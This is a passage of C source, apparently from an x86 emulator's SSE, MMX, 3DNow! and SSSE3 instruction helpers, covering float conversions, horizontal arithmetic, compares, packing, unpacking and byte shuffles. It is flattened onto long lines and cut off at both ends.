*/ #define WRAP_FLOATCONV(RETTYPE, FN, FLOATTYPE, INDEFVALUE) \ static inline RETTYPE x86_##FN(FLOATTYPE a, float_status *s) \ { \ int oldflags, newflags; \ RETTYPE r; \ \ oldflags = get_float_exception_flags(s); \ set_float_exception_flags(0, s); \ r = FN(a, s); \ newflags = get_float_exception_flags(s); \ if (newflags & float_flag_invalid) { \ r = INDEFVALUE; \ } \ set_float_exception_flags(newflags | oldflags, s); \ return r; \ } WRAP_FLOATCONV(int32_t, float32_to_int32, float32, INT32_MIN) WRAP_FLOATCONV(int32_t, float32_to_int32_round_to_zero, float32, INT32_MIN) WRAP_FLOATCONV(int32_t, float64_to_int32, float64, INT32_MIN) WRAP_FLOATCONV(int32_t, float64_to_int32_round_to_zero, float64, INT32_MIN) WRAP_FLOATCONV(int64_t, float32_to_int64, float32, INT64_MIN) WRAP_FLOATCONV(int64_t, float32_to_int64_round_to_zero, float32, INT64_MIN) WRAP_FLOATCONV(int64_t, float64_to_int64, float64, INT64_MIN) WRAP_FLOATCONV(int64_t, float64_to_int64_round_to_zero, float64, INT64_MIN) void helper_cvtps2dq(CPUX86State *env, ZMMReg *d, ZMMReg *s) { d->ZMM_L(0) = x86_float32_to_int32(s->ZMM_S(0), &env->sse_status); d->ZMM_L(1) = x86_float32_to_int32(s->ZMM_S(1), &env->sse_status); d->ZMM_L(2) = x86_float32_to_int32(s->ZMM_S(2), &env->sse_status); d->ZMM_L(3) = x86_float32_to_int32(s->ZMM_S(3), &env->sse_status); } void helper_cvtpd2dq(CPUX86State *env, ZMMReg *d, ZMMReg *s) { d->ZMM_L(0) = x86_float64_to_int32(s->ZMM_D(0), &env->sse_status); d->ZMM_L(1) = x86_float64_to_int32(s->ZMM_D(1), &env->sse_status); d->ZMM_Q(1) = 0; } void helper_cvtps2pi(CPUX86State *env, MMXReg *d, ZMMReg *s) { d->MMX_L(0) = x86_float32_to_int32(s->ZMM_S(0), &env->sse_status); d->MMX_L(1) = x86_float32_to_int32(s->ZMM_S(1), &env->sse_status); } void helper_cvtpd2pi(CPUX86State *env, MMXReg *d, ZMMReg *s) { d->MMX_L(0) = x86_float64_to_int32(s->ZMM_D(0), &env->sse_status); d->MMX_L(1) = x86_float64_to_int32(s->ZMM_D(1), &env->sse_status); } int32_t helper_cvtss2si(CPUX86State *env, ZMMReg *s) { return x86_float32_to_int32(s->ZMM_S(0), &env->sse_status); } int32_t helper_cvtsd2si(CPUX86State *env, ZMMReg *s) { return x86_float64_to_int32(s->ZMM_D(0), &env->sse_status); } #ifdef TARGET_X86_64 int64_t helper_cvtss2sq(CPUX86State *env, ZMMReg *s) { return x86_float32_to_int64(s->ZMM_S(0), &env->sse_status); } int64_t helper_cvtsd2sq(CPUX86State *env, ZMMReg *s) { return x86_float64_to_int64(s->ZMM_D(0), &env->sse_status); } #endif /* float to integer truncated */ void helper_cvttps2dq(CPUX86State *env, ZMMReg *d, ZMMReg *s) { d->ZMM_L(0) = x86_float32_to_int32_round_to_zero(s->ZMM_S(0), &env->sse_status); d->ZMM_L(1) = x86_float32_to_int32_round_to_zero(s->ZMM_S(1), &env->sse_status); d->ZMM_L(2) = x86_float32_to_int32_round_to_zero(s->ZMM_S(2), &env->sse_status); d->ZMM_L(3) = x86_float32_to_int32_round_to_zero(s->ZMM_S(3), &env->sse_status); } void helper_cvttpd2dq(CPUX86State *env, ZMMReg *d, ZMMReg *s) { d->ZMM_L(0) = x86_float64_to_int32_round_to_zero(s->ZMM_D(0), &env->sse_status); d->ZMM_L(1) = x86_float64_to_int32_round_to_zero(s->ZMM_D(1), &env->sse_status); d->ZMM_Q(1) = 0; } void helper_cvttps2pi(CPUX86State *env, MMXReg *d, ZMMReg *s) { d->MMX_L(0) = x86_float32_to_int32_round_to_zero(s->ZMM_S(0), &env->sse_status); d->MMX_L(1) = x86_float32_to_int32_round_to_zero(s->ZMM_S(1), &env->sse_status); } void helper_cvttpd2pi(CPUX86State *env, MMXReg *d, ZMMReg *s) { d->MMX_L(0) = x86_float64_to_int32_round_to_zero(s->ZMM_D(0), &env->sse_status); d->MMX_L(1) = x86_float64_to_int32_round_to_zero(s->ZMM_D(1), &env->sse_status); 
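    /*
     * Editorial note (added): the cvtt* ("truncating") conversions above
     * and below use the _round_to_zero wrappers, so they ignore the
     * rounding mode configured in MXCSR, as the instruction set requires.
     */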
} int32_t helper_cvttss2si(CPUX86State *env, ZMMReg *s) { return x86_float32_to_int32_round_to_zero(s->ZMM_S(0), &env->sse_status); } int32_t helper_cvttsd2si(CPUX86State *env, ZMMReg *s) { return x86_float64_to_int32_round_to_zero(s->ZMM_D(0), &env->sse_status); } #ifdef TARGET_X86_64 int64_t helper_cvttss2sq(CPUX86State *env, ZMMReg *s) { return x86_float32_to_int64_round_to_zero(s->ZMM_S(0), &env->sse_status); } int64_t helper_cvttsd2sq(CPUX86State *env, ZMMReg *s) { return x86_float64_to_int64_round_to_zero(s->ZMM_D(0), &env->sse_status); } #endif void helper_rsqrtps(CPUX86State *env, ZMMReg *d, ZMMReg *s) { d->ZMM_S(0) = float32_div(float32_one, float32_sqrt(s->ZMM_S(0), &env->sse_status), &env->sse_status); d->ZMM_S(1) = float32_div(float32_one, float32_sqrt(s->ZMM_S(1), &env->sse_status), &env->sse_status); d->ZMM_S(2) = float32_div(float32_one, float32_sqrt(s->ZMM_S(2), &env->sse_status), &env->sse_status); d->ZMM_S(3) = float32_div(float32_one, float32_sqrt(s->ZMM_S(3), &env->sse_status), &env->sse_status); } void helper_rsqrtss(CPUX86State *env, ZMMReg *d, ZMMReg *s) { d->ZMM_S(0) = float32_div(float32_one, float32_sqrt(s->ZMM_S(0), &env->sse_status), &env->sse_status); } void helper_rcpps(CPUX86State *env, ZMMReg *d, ZMMReg *s) { d->ZMM_S(0) = float32_div(float32_one, s->ZMM_S(0), &env->sse_status); d->ZMM_S(1) = float32_div(float32_one, s->ZMM_S(1), &env->sse_status); d->ZMM_S(2) = float32_div(float32_one, s->ZMM_S(2), &env->sse_status); d->ZMM_S(3) = float32_div(float32_one, s->ZMM_S(3), &env->sse_status); } void helper_rcpss(CPUX86State *env, ZMMReg *d, ZMMReg *s) { d->ZMM_S(0) = float32_div(float32_one, s->ZMM_S(0), &env->sse_status); } static inline uint64_t helper_extrq(uint64_t src, int shift, int len) { uint64_t mask; if (len == 0) { mask = ~0LL; } else { mask = (1ULL << len) - 1; } return (src >> shift) & mask; } void helper_extrq_r(CPUX86State *env, ZMMReg *d, ZMMReg *s) { d->ZMM_Q(0) = helper_extrq(d->ZMM_Q(0), s->ZMM_B(1), s->ZMM_B(0)); } void helper_extrq_i(CPUX86State *env, ZMMReg *d, int index, int length) { d->ZMM_Q(0) = helper_extrq(d->ZMM_Q(0), index, length); } static inline uint64_t helper_insertq(uint64_t src, int shift, int len) { uint64_t mask; if (len == 0) { mask = ~0ULL; } else { mask = (1ULL << len) - 1; } return (src & ~(mask << shift)) | ((src & mask) << shift); } void helper_insertq_r(CPUX86State *env, ZMMReg *d, ZMMReg *s) { d->ZMM_Q(0) = helper_insertq(s->ZMM_Q(0), s->ZMM_B(9), s->ZMM_B(8)); } void helper_insertq_i(CPUX86State *env, ZMMReg *d, int index, int length) { d->ZMM_Q(0) = helper_insertq(d->ZMM_Q(0), index, length); } void helper_haddps(CPUX86State *env, ZMMReg *d, ZMMReg *s) { ZMMReg r; r.ZMM_S(0) = float32_add(d->ZMM_S(0), d->ZMM_S(1), &env->sse_status); r.ZMM_S(1) = float32_add(d->ZMM_S(2), d->ZMM_S(3), &env->sse_status); r.ZMM_S(2) = float32_add(s->ZMM_S(0), s->ZMM_S(1), &env->sse_status); r.ZMM_S(3) = float32_add(s->ZMM_S(2), s->ZMM_S(3), &env->sse_status); *d = r; } void helper_haddpd(CPUX86State *env, ZMMReg *d, ZMMReg *s) { ZMMReg r; r.ZMM_D(0) = float64_add(d->ZMM_D(0), d->ZMM_D(1), &env->sse_status); r.ZMM_D(1) = float64_add(s->ZMM_D(0), s->ZMM_D(1), &env->sse_status); *d = r; } void helper_hsubps(CPUX86State *env, ZMMReg *d, ZMMReg *s) { ZMMReg r; r.ZMM_S(0) = float32_sub(d->ZMM_S(0), d->ZMM_S(1), &env->sse_status); r.ZMM_S(1) = float32_sub(d->ZMM_S(2), d->ZMM_S(3), &env->sse_status); r.ZMM_S(2) = float32_sub(s->ZMM_S(0), s->ZMM_S(1), &env->sse_status); r.ZMM_S(3) = float32_sub(s->ZMM_S(2), s->ZMM_S(3), &env->sse_status); *d = 
r; } void helper_hsubpd(CPUX86State *env, ZMMReg *d, ZMMReg *s) { ZMMReg r; r.ZMM_D(0) = float64_sub(d->ZMM_D(0), d->ZMM_D(1), &env->sse_status); r.ZMM_D(1) = float64_sub(s->ZMM_D(0), s->ZMM_D(1), &env->sse_status); *d = r; } void helper_addsubps(CPUX86State *env, ZMMReg *d, ZMMReg *s) { d->ZMM_S(0) = float32_sub(d->ZMM_S(0), s->ZMM_S(0), &env->sse_status); d->ZMM_S(1) = float32_add(d->ZMM_S(1), s->ZMM_S(1), &env->sse_status); d->ZMM_S(2) = float32_sub(d->ZMM_S(2), s->ZMM_S(2), &env->sse_status); d->ZMM_S(3) = float32_add(d->ZMM_S(3), s->ZMM_S(3), &env->sse_status); } void helper_addsubpd(CPUX86State *env, ZMMReg *d, ZMMReg *s) { d->ZMM_D(0) = float64_sub(d->ZMM_D(0), s->ZMM_D(0), &env->sse_status); d->ZMM_D(1) = float64_add(d->ZMM_D(1), s->ZMM_D(1), &env->sse_status); } /* XXX: unordered */ #define SSE_HELPER_CMP(name, F) \ void helper_ ## name ## ps(CPUX86State *env, Reg *d, Reg *s) \ { \ d->ZMM_L(0) = F(32, d->ZMM_S(0), s->ZMM_S(0)); \ d->ZMM_L(1) = F(32, d->ZMM_S(1), s->ZMM_S(1)); \ d->ZMM_L(2) = F(32, d->ZMM_S(2), s->ZMM_S(2)); \ d->ZMM_L(3) = F(32, d->ZMM_S(3), s->ZMM_S(3)); \ } \ \ void helper_ ## name ## ss(CPUX86State *env, Reg *d, Reg *s) \ { \ d->ZMM_L(0) = F(32, d->ZMM_S(0), s->ZMM_S(0)); \ } \ \ void helper_ ## name ## pd(CPUX86State *env, Reg *d, Reg *s) \ { \ d->ZMM_Q(0) = F(64, d->ZMM_D(0), s->ZMM_D(0)); \ d->ZMM_Q(1) = F(64, d->ZMM_D(1), s->ZMM_D(1)); \ } \ \ void helper_ ## name ## sd(CPUX86State *env, Reg *d, Reg *s) \ { \ d->ZMM_Q(0) = F(64, d->ZMM_D(0), s->ZMM_D(0)); \ } #define FPU_CMPEQ(size, a, b) \ (float ## size ## _eq_quiet(a, b, &env->sse_status) ? -1 : 0) #define FPU_CMPLT(size, a, b) \ (float ## size ## _lt(a, b, &env->sse_status) ? -1 : 0) #define FPU_CMPLE(size, a, b) \ (float ## size ## _le(a, b, &env->sse_status) ? -1 : 0) #define FPU_CMPUNORD(size, a, b) \ (float ## size ## _unordered_quiet(a, b, &env->sse_status) ? -1 : 0) #define FPU_CMPNEQ(size, a, b) \ (float ## size ## _eq_quiet(a, b, &env->sse_status) ? 0 : -1) #define FPU_CMPNLT(size, a, b) \ (float ## size ## _lt(a, b, &env->sse_status) ? 0 : -1) #define FPU_CMPNLE(size, a, b) \ (float ## size ## _le(a, b, &env->sse_status) ? 0 : -1) #define FPU_CMPORD(size, a, b) \ (float ## size ## _unordered_quiet(a, b, &env->sse_status) ? 
0 : -1) SSE_HELPER_CMP(cmpeq, FPU_CMPEQ) SSE_HELPER_CMP(cmplt, FPU_CMPLT) SSE_HELPER_CMP(cmple, FPU_CMPLE) SSE_HELPER_CMP(cmpunord, FPU_CMPUNORD) SSE_HELPER_CMP(cmpneq, FPU_CMPNEQ) SSE_HELPER_CMP(cmpnlt, FPU_CMPNLT) SSE_HELPER_CMP(cmpnle, FPU_CMPNLE) SSE_HELPER_CMP(cmpord, FPU_CMPORD) static const int comis_eflags[4] = {CC_C, CC_Z, 0, CC_Z | CC_P | CC_C}; void helper_ucomiss(CPUX86State *env, Reg *d, Reg *s) { int ret; float32 s0, s1; s0 = d->ZMM_S(0); s1 = s->ZMM_S(0); ret = float32_compare_quiet(s0, s1, &env->sse_status); CC_SRC = comis_eflags[ret + 1]; } void helper_comiss(CPUX86State *env, Reg *d, Reg *s) { int ret; float32 s0, s1; s0 = d->ZMM_S(0); s1 = s->ZMM_S(0); ret = float32_compare(s0, s1, &env->sse_status); CC_SRC = comis_eflags[ret + 1]; } void helper_ucomisd(CPUX86State *env, Reg *d, Reg *s) { int ret; float64 d0, d1; d0 = d->ZMM_D(0); d1 = s->ZMM_D(0); ret = float64_compare_quiet(d0, d1, &env->sse_status); CC_SRC = comis_eflags[ret + 1]; } void helper_comisd(CPUX86State *env, Reg *d, Reg *s) { int ret; float64 d0, d1; d0 = d->ZMM_D(0); d1 = s->ZMM_D(0); ret = float64_compare(d0, d1, &env->sse_status); CC_SRC = comis_eflags[ret + 1]; } uint32_t helper_movmskps(CPUX86State *env, Reg *s) { int b0, b1, b2, b3; b0 = s->ZMM_L(0) >> 31; b1 = s->ZMM_L(1) >> 31; b2 = s->ZMM_L(2) >> 31; b3 = s->ZMM_L(3) >> 31; return b0 | (b1 << 1) | (b2 << 2) | (b3 << 3); } uint32_t helper_movmskpd(CPUX86State *env, Reg *s) { int b0, b1; b0 = s->ZMM_L(1) >> 31; b1 = s->ZMM_L(3) >> 31; return b0 | (b1 << 1); } #endif uint32_t glue(helper_pmovmskb, SUFFIX)(CPUX86State *env, Reg *s) { uint32_t val; val = 0; val |= (s->B(0) >> 7); val |= (s->B(1) >> 6) & 0x02; val |= (s->B(2) >> 5) & 0x04; val |= (s->B(3) >> 4) & 0x08; val |= (s->B(4) >> 3) & 0x10; val |= (s->B(5) >> 2) & 0x20; val |= (s->B(6) >> 1) & 0x40; val |= (s->B(7)) & 0x80; #if SHIFT == 1 val |= (s->B(8) << 1) & 0x0100; val |= (s->B(9) << 2) & 0x0200; val |= (s->B(10) << 3) & 0x0400; val |= (s->B(11) << 4) & 0x0800; val |= (s->B(12) << 5) & 0x1000; val |= (s->B(13) << 6) & 0x2000; val |= (s->B(14) << 7) & 0x4000; val |= (s->B(15) << 8) & 0x8000; #endif return val; } void glue(helper_packsswb, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { Reg r; r.B(0) = satsb((int16_t)d->W(0)); r.B(1) = satsb((int16_t)d->W(1)); r.B(2) = satsb((int16_t)d->W(2)); r.B(3) = satsb((int16_t)d->W(3)); #if SHIFT == 1 r.B(4) = satsb((int16_t)d->W(4)); r.B(5) = satsb((int16_t)d->W(5)); r.B(6) = satsb((int16_t)d->W(6)); r.B(7) = satsb((int16_t)d->W(7)); #endif r.B((4 << SHIFT) + 0) = satsb((int16_t)s->W(0)); r.B((4 << SHIFT) + 1) = satsb((int16_t)s->W(1)); r.B((4 << SHIFT) + 2) = satsb((int16_t)s->W(2)); r.B((4 << SHIFT) + 3) = satsb((int16_t)s->W(3)); #if SHIFT == 1 r.B(12) = satsb((int16_t)s->W(4)); r.B(13) = satsb((int16_t)s->W(5)); r.B(14) = satsb((int16_t)s->W(6)); r.B(15) = satsb((int16_t)s->W(7)); #endif *d = r; } void glue(helper_packuswb, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { Reg r; r.B(0) = satub((int16_t)d->W(0)); r.B(1) = satub((int16_t)d->W(1)); r.B(2) = satub((int16_t)d->W(2)); r.B(3) = satub((int16_t)d->W(3)); #if SHIFT == 1 r.B(4) = satub((int16_t)d->W(4)); r.B(5) = satub((int16_t)d->W(5)); r.B(6) = satub((int16_t)d->W(6)); r.B(7) = satub((int16_t)d->W(7)); #endif r.B((4 << SHIFT) + 0) = satub((int16_t)s->W(0)); r.B((4 << SHIFT) + 1) = satub((int16_t)s->W(1)); r.B((4 << SHIFT) + 2) = satub((int16_t)s->W(2)); r.B((4 << SHIFT) + 3) = satub((int16_t)s->W(3)); #if SHIFT == 1 r.B(12) = satub((int16_t)s->W(4)); r.B(13) = satub((int16_t)s->W(5)); r.B(14) = 
satub((int16_t)s->W(6)); r.B(15) = satub((int16_t)s->W(7)); #endif *d = r; } void glue(helper_packssdw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { Reg r; r.W(0) = satsw(d->L(0)); r.W(1) = satsw(d->L(1)); #if SHIFT == 1 r.W(2) = satsw(d->L(2)); r.W(3) = satsw(d->L(3)); #endif r.W((2 << SHIFT) + 0) = satsw(s->L(0)); r.W((2 << SHIFT) + 1) = satsw(s->L(1)); #if SHIFT == 1 r.W(6) = satsw(s->L(2)); r.W(7) = satsw(s->L(3)); #endif *d = r; } #define UNPCK_OP(base_name, base) \ \ void glue(helper_punpck ## base_name ## bw, SUFFIX)(CPUX86State *env,\ Reg *d, Reg *s) \ { \ Reg r; \ \ r.B(0) = d->B((base << (SHIFT + 2)) + 0); \ r.B(1) = s->B((base << (SHIFT + 2)) + 0); \ r.B(2) = d->B((base << (SHIFT + 2)) + 1); \ r.B(3) = s->B((base << (SHIFT + 2)) + 1); \ r.B(4) = d->B((base << (SHIFT + 2)) + 2); \ r.B(5) = s->B((base << (SHIFT + 2)) + 2); \ r.B(6) = d->B((base << (SHIFT + 2)) + 3); \ r.B(7) = s->B((base << (SHIFT + 2)) + 3); \ XMM_ONLY( \ r.B(8) = d->B((base << (SHIFT + 2)) + 4); \ r.B(9) = s->B((base << (SHIFT + 2)) + 4); \ r.B(10) = d->B((base << (SHIFT + 2)) + 5); \ r.B(11) = s->B((base << (SHIFT + 2)) + 5); \ r.B(12) = d->B((base << (SHIFT + 2)) + 6); \ r.B(13) = s->B((base << (SHIFT + 2)) + 6); \ r.B(14) = d->B((base << (SHIFT + 2)) + 7); \ r.B(15) = s->B((base << (SHIFT + 2)) + 7); \ ) \ *d = r; \ } \ \ void glue(helper_punpck ## base_name ## wd, SUFFIX)(CPUX86State *env,\ Reg *d, Reg *s) \ { \ Reg r; \ \ r.W(0) = d->W((base << (SHIFT + 1)) + 0); \ r.W(1) = s->W((base << (SHIFT + 1)) + 0); \ r.W(2) = d->W((base << (SHIFT + 1)) + 1); \ r.W(3) = s->W((base << (SHIFT + 1)) + 1); \ XMM_ONLY( \ r.W(4) = d->W((base << (SHIFT + 1)) + 2); \ r.W(5) = s->W((base << (SHIFT + 1)) + 2); \ r.W(6) = d->W((base << (SHIFT + 1)) + 3); \ r.W(7) = s->W((base << (SHIFT + 1)) + 3); \ ) \ *d = r; \ } \ \ void glue(helper_punpck ## base_name ## dq, SUFFIX)(CPUX86State *env,\ Reg *d, Reg *s) \ { \ Reg r; \ \ r.L(0) = d->L((base << SHIFT) + 0); \ r.L(1) = s->L((base << SHIFT) + 0); \ XMM_ONLY( \ r.L(2) = d->L((base << SHIFT) + 1); \ r.L(3) = s->L((base << SHIFT) + 1); \ ) \ *d = r; \ } \ \ XMM_ONLY( \ void glue(helper_punpck ## base_name ## qdq, SUFFIX)(CPUX86State \ *env, \ Reg *d, \ Reg *s) \ { \ Reg r; \ \ r.Q(0) = d->Q(base); \ r.Q(1) = s->Q(base); \ *d = r; \ } \ ) UNPCK_OP(l, 0) UNPCK_OP(h, 1) /* 3DNow! 
float ops */ #if SHIFT == 0 void helper_pi2fd(CPUX86State *env, MMXReg *d, MMXReg *s) { d->MMX_S(0) = int32_to_float32(s->MMX_L(0), &env->mmx_status); d->MMX_S(1) = int32_to_float32(s->MMX_L(1), &env->mmx_status); } void helper_pi2fw(CPUX86State *env, MMXReg *d, MMXReg *s) { d->MMX_S(0) = int32_to_float32((int16_t)s->MMX_W(0), &env->mmx_status); d->MMX_S(1) = int32_to_float32((int16_t)s->MMX_W(2), &env->mmx_status); } void helper_pf2id(CPUX86State *env, MMXReg *d, MMXReg *s) { d->MMX_L(0) = float32_to_int32_round_to_zero(s->MMX_S(0), &env->mmx_status); d->MMX_L(1) = float32_to_int32_round_to_zero(s->MMX_S(1), &env->mmx_status); } void helper_pf2iw(CPUX86State *env, MMXReg *d, MMXReg *s) { d->MMX_L(0) = satsw(float32_to_int32_round_to_zero(s->MMX_S(0), &env->mmx_status)); d->MMX_L(1) = satsw(float32_to_int32_round_to_zero(s->MMX_S(1), &env->mmx_status)); } void helper_pfacc(CPUX86State *env, MMXReg *d, MMXReg *s) { MMXReg r; r.MMX_S(0) = float32_add(d->MMX_S(0), d->MMX_S(1), &env->mmx_status); r.MMX_S(1) = float32_add(s->MMX_S(0), s->MMX_S(1), &env->mmx_status); *d = r; } void helper_pfadd(CPUX86State *env, MMXReg *d, MMXReg *s) { d->MMX_S(0) = float32_add(d->MMX_S(0), s->MMX_S(0), &env->mmx_status); d->MMX_S(1) = float32_add(d->MMX_S(1), s->MMX_S(1), &env->mmx_status); } void helper_pfcmpeq(CPUX86State *env, MMXReg *d, MMXReg *s) { d->MMX_L(0) = float32_eq_quiet(d->MMX_S(0), s->MMX_S(0), &env->mmx_status) ? -1 : 0; d->MMX_L(1) = float32_eq_quiet(d->MMX_S(1), s->MMX_S(1), &env->mmx_status) ? -1 : 0; } void helper_pfcmpge(CPUX86State *env, MMXReg *d, MMXReg *s) { d->MMX_L(0) = float32_le(s->MMX_S(0), d->MMX_S(0), &env->mmx_status) ? -1 : 0; d->MMX_L(1) = float32_le(s->MMX_S(1), d->MMX_S(1), &env->mmx_status) ? -1 : 0; } void helper_pfcmpgt(CPUX86State *env, MMXReg *d, MMXReg *s) { d->MMX_L(0) = float32_lt(s->MMX_S(0), d->MMX_S(0), &env->mmx_status) ? -1 : 0; d->MMX_L(1) = float32_lt(s->MMX_S(1), d->MMX_S(1), &env->mmx_status) ? 
-1 : 0; } void helper_pfmax(CPUX86State *env, MMXReg *d, MMXReg *s) { if (float32_lt(d->MMX_S(0), s->MMX_S(0), &env->mmx_status)) { d->MMX_S(0) = s->MMX_S(0); } if (float32_lt(d->MMX_S(1), s->MMX_S(1), &env->mmx_status)) { d->MMX_S(1) = s->MMX_S(1); } } void helper_pfmin(CPUX86State *env, MMXReg *d, MMXReg *s) { if (float32_lt(s->MMX_S(0), d->MMX_S(0), &env->mmx_status)) { d->MMX_S(0) = s->MMX_S(0); } if (float32_lt(s->MMX_S(1), d->MMX_S(1), &env->mmx_status)) { d->MMX_S(1) = s->MMX_S(1); } } void helper_pfmul(CPUX86State *env, MMXReg *d, MMXReg *s) { d->MMX_S(0) = float32_mul(d->MMX_S(0), s->MMX_S(0), &env->mmx_status); d->MMX_S(1) = float32_mul(d->MMX_S(1), s->MMX_S(1), &env->mmx_status); } void helper_pfnacc(CPUX86State *env, MMXReg *d, MMXReg *s) { MMXReg r; r.MMX_S(0) = float32_sub(d->MMX_S(0), d->MMX_S(1), &env->mmx_status); r.MMX_S(1) = float32_sub(s->MMX_S(0), s->MMX_S(1), &env->mmx_status); *d = r; } void helper_pfpnacc(CPUX86State *env, MMXReg *d, MMXReg *s) { MMXReg r; r.MMX_S(0) = float32_sub(d->MMX_S(0), d->MMX_S(1), &env->mmx_status); r.MMX_S(1) = float32_add(s->MMX_S(0), s->MMX_S(1), &env->mmx_status); *d = r; } void helper_pfrcp(CPUX86State *env, MMXReg *d, MMXReg *s) { d->MMX_S(0) = float32_div(float32_one, s->MMX_S(0), &env->mmx_status); d->MMX_S(1) = d->MMX_S(0); } void helper_pfrsqrt(CPUX86State *env, MMXReg *d, MMXReg *s) { d->MMX_L(1) = s->MMX_L(0) & 0x7fffffff; d->MMX_S(1) = float32_div(float32_one, float32_sqrt(d->MMX_S(1), &env->mmx_status), &env->mmx_status); d->MMX_L(1) |= s->MMX_L(0) & 0x80000000; d->MMX_L(0) = d->MMX_L(1); } void helper_pfsub(CPUX86State *env, MMXReg *d, MMXReg *s) { d->MMX_S(0) = float32_sub(d->MMX_S(0), s->MMX_S(0), &env->mmx_status); d->MMX_S(1) = float32_sub(d->MMX_S(1), s->MMX_S(1), &env->mmx_status); } void helper_pfsubr(CPUX86State *env, MMXReg *d, MMXReg *s) { d->MMX_S(0) = float32_sub(s->MMX_S(0), d->MMX_S(0), &env->mmx_status); d->MMX_S(1) = float32_sub(s->MMX_S(1), d->MMX_S(1), &env->mmx_status); } void helper_pswapd(CPUX86State *env, MMXReg *d, MMXReg *s) { MMXReg r; r.MMX_L(0) = s->MMX_L(1); r.MMX_L(1) = s->MMX_L(0); *d = r; } #endif /* SSSE3 op helpers */ void glue(helper_pshufb, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int i; Reg r; for (i = 0; i < (8 << SHIFT); i++) { r.B(i) = (s->B(i) & 0x80) ? 
0 : (d->B(s->B(i) & ((8 << SHIFT) - 1))); } *d = r; } void glue(helper_phaddw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { d->W(0) = (int16_t)d->W(0) + (int16_t)d->W(1); d->W(1) = (int16_t)d->W(2) + (int16_t)d->W(3); XMM_ONLY(d->W(2) = (int16_t)d->W(4) + (int16_t)d->W(5)); XMM_ONLY(d->W(3) = (int16_t)d->W(6) + (int16_t)d->W(7)); d->W((2 << SHIFT) + 0) = (int16_t)s->W(0) + (int16_t)s->W(1); d->W((2 << SHIFT) + 1) = (int16_t)s->W(2) + (int16_t)s->W(3); XMM_ONLY(d->W(6) = (int16_t)s->W(4) + (int16_t)s->W(5)); XMM_ONLY(d->W(7) = (int16_t)s->W(6) + (int16_t)s->W(7)); } void glue(helper_phaddd, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { d->L(0) = (int32_t)d->L(0) + (int32_t)d->L(1); XMM_ONLY(d->L(1) = (int32_t)d->L(2) + (int32_t)d->L(3)); d->L((1 << SHIFT) + 0) = (int32_t)s->L(0) + (int32_t)s->L(1); XMM_ONLY(d->L(3) = (int32_t)s->L(2) + (int32_t)s->L(3)); } void glue(helper_phaddsw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { d->W(0) = satsw((int16_t)d->W(0) + (int16_t)d->W(1)); d->W(1) = satsw((int16_t)d->W(2) + (int16_t)d->W(3)); XMM_ONLY(d->W(2) = satsw((int16_t)d->W(4) + (int16_t)d->W(5))); XMM_ONLY(d->W(3) = satsw((int16_t)d->W(6) + (int16_t)d->W(7))); d->W((2 << SHIFT) + 0) = satsw((int16_t)s->W(0) + (int16_t)s->W(1)); d->W((2 << SHIFT) + 1) = satsw((int16_t)s->W(2) + (int16_t)s->W(3)); XMM_ONLY(d->W(6) = satsw((int16_t)s->W(4) + (int16_t)s->W(5))); XMM_ONLY(d->W(7) = satsw((int16_t)s->W(6) + (int16_t)s->W(7))); } void glue(helper_pmaddubsw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { d->W(0) = satsw((int8_t)s->B(0) * (uint8_t)d->B(0) + (int8_t)s->B(1) * (uint8_t)d->B(1)); d->W(1) = satsw((int8_t)s->B(2) * (uint8_t)d->B(2) + (int8_t)s->B(3) * (uint8_t)d->B(3)); d->W(2) = satsw((int8_t)s->B(4) * (uint8_t)d->B(4) + (int8_t)s->B(5) * (uint8_t)d->B(5)); d->W(3) = satsw((int8_t)s->B(6) * (uint8_t)d->B(6) + (int8_t)s->B(7) * (uint8_t)d->B(7)); #if SHIFT == 1 d->W(4) = satsw((int8_t)s->B(8) * (uint8_t)d->B(8) + (int8_t)s->B(9) * (uint8_t)d->B(9)); d->W(5) = satsw((int8_t)s->B(10) * (uint8_t)d->B(10) + (int8_t)s->B(11) * (uint8_t)d->B(11)); d->W(6) = satsw((int8_t)s->B(12) * (uint8_t)d->B(12) + (int8_t)s->B(13) * (uint8_t)d->B(13)); d->W(7) = satsw((int8_t)s->B(14) * (uint8_t)d->B(14) + (int8_t)s->B(15) * (uint8_t)d->B(15)); #endif } void glue(helper_phsubw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { d->W(0) = (int16_t)d->W(0) - (int16_t)d->W(1); d->W(1) = (int16_t)d->W(2) - (int16_t)d->W(3); XMM_ONLY(d->W(2) = (int16_t)d->W(4) - (int16_t)d->W(5)); XMM_ONLY(d->W(3) = (int16_t)d->W(6) - (int16_t)d->W(7)); d->W((2 << SHIFT) + 0) = (int16_t)s->W(0) - (int16_t)s->W(1); d->W((2 << SHIFT) + 1) = (int16_t)s->W(2) - (int16_t)s->W(3); XMM_ONLY(d->W(6) = (int16_t)s->W(4) - (int16_t)s->W(5)); XMM_ONLY(d->W(7) = (int16_t)s->W(6) - (int16_t)s->W(7)); } void glue(helper_phsubd, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { d->L(0) = (int32_t)d->L(0) - (int32_t)d->L(1); XMM_ONLY(d->L(1) = (int32_t)d->L(2) - (int32_t)d->L(3)); d->L((1 << SHIFT) + 0) = (int32_t)s->L(0) - (int32_t)s->L(1); XMM_ONLY(d->L(3) = (int32_t)s->L(2) - (int32_t)s->L(3)); } void glue(helper_phsubsw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { d->W(0) = satsw((int16_t)d->W(0) - (int16_t)d->W(1)); d->W(1) = satsw((int16_t)d->W(2) - (int16_t)d->W(3)); XMM_ONLY(d->W(2) = satsw((int16_t)d->W(4) - (int16_t)d->W(5))); XMM_ONLY(d->W(3) = satsw((int16_t)d->W(6) - (int16_t)d->W(7))); d->W((2 << SHIFT) + 0) = satsw((int16_t)s->W(0) - (int16_t)s->W(1)); d->W((2 << SHIFT) + 1) = satsw((int16_t)s->W(2) - (int16_t)s->W(3)); XMM_ONLY(d->W(6) = 
